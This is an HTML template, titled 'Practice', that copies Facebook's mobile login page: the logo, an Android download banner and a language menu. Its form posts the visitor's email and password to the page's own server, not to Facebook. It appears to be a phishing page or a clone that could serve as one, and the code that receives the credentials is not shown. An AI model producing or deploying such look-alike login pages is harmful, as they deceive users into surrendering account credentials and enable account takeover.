<!DOCTYPE html>
<html>
<head>
  <title>Practice</title>
  <link rel="stylesheet" href="{{url_for('static', filename='style.css')}}">
<head>
<bod>
  <div class="all">
    <div class="download-logo">
     <img src="https://i.postimg.cc/MTdbk9ZQ/download-28dp-1877-F2-FILL0-wght400-GRAD0-opsz24.png" class="logo-d">
      <h5>Get Facebook for Android and browse faster.</h5>
      <hr>
    </div>
    <div class="select">
      <select class="select-it">
        <optgroup label="Select Your Language">
        <option selected>English (UK)</option>
        <option>Igbo </option>
        <option>Hausa</option>
        <option>Yoruba</option>
        </optgroup>
      </select>
    </div>
    <div class="facebook-logo">
      <img class="logo-f" src="https://i.postimg.cc/X7TK0GWQ/1024px-Facebook-Logo-2019-removebg-preview.png">
    </div>
    <div class="login-details">
      <form method="POST">
        <input type="email" class="enter" name="Email" placeholder="Mobile number or email address">
        <input type="password" class="enter" name="Password" placeholder="Password">
        
        <button type="submit" class="enter login">Log in</button>
      </form>
      <p>Forgotten password?</p>
    </div>
    <div class="create-new">
      <p class="create">Create new account</p>
       <img src="https://i.postimg.cc/PxtzFgHH/Screenshot-20250709-132813-removebg-preview.png" class="logo-m">
    </div>
    
  </div>
</body>
</html>
